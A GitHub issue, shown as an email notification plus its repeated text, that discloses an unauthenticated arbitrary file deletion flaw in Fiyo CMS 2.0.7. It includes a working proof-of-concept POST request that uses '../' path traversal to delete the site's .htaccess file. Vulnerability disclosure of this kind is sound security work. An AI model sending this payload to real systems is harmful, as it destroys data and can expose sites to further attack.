On 17 April 2017 at 15:12, jgj212 ***@***.***> wrote:
I found that Fiyo CMS version 2.0.7 has a any file delete vulnerability
that do not need login.
[image: 1]
<https://cloud.githubusercontent.com/assets/1484292/25083238/806d7102-2388-11e7-807c-94f73950a3b2.png>
There is not any checking about the $_POST['act'] $_POST[file] , client
can control these two input to cause any file deletion .
reproduce(this will delete .htaccess file):
Url: http://localhost /dapur/apps/app_config/controller/backuper.php
POST: type=delete&act=db&file=../.htaccess
Referrer: http://localhost
Discoverer: ADLab of VenusTech.
—
You are receiving this because you are subscribed to this thread.
Reply to this email directly, view it on GitHub
<#2>, or mute the thread
<https://github.com/notifications/unsubscribe-auth/ADAVXk7gzhfODYrZ-ykhTtilAnQfQK0Pks5rwx7WgaJpZM4M-9zj>
.
I found that Fiyo CMS version 2.0.7 has a any file delete vulnerability that do not need login.
There is not any checking about the $_POST['act'] $_POST[file] , client can control these two input to cause any file deletion .
reproduce(this will delete .htaccess file):
Url: http://localhost /dapur/apps/app_config/controller/backuper.php
POST: type=delete&act=db&file=../.htaccess
Referrer: http://localhost
Discoverer: ADLab of VenusTech.
The text was updated successfully, but these errors were encountered: